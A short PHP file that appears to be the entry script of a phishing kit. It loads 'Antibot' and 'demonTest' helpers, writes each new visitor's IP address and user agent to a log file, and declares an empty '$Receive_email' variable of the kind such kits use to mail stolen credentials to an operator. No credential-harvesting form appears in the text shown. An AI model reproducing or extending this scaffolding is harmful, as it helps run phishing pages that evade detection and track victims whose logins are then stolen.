<?php
	session_start();

    require_once '../../Meta/Comp.php';
    require_once '../../Meta/Antibot.php';
    require_once '../../Meta/demonTest.php';

    $comps = new Comp;
    $antibot = new Antibot;

    $settings = $comps->settings();

    
    if (
        !isset($_SESSION['visitor']) ||
        !$_SESSION['visitor']
    ) {
        $comps->log(
            "../Guard/Audio/live.txt",
            "IP: " . $_SESSION['ip'] . "\nUser Agent: " . $comps->getUserAgent() . "\nAction: Visitor\n\n"
        );
        $_SESSION['visitor'] = 1;
    }

?>
<?php

$Receive_email = '';
?>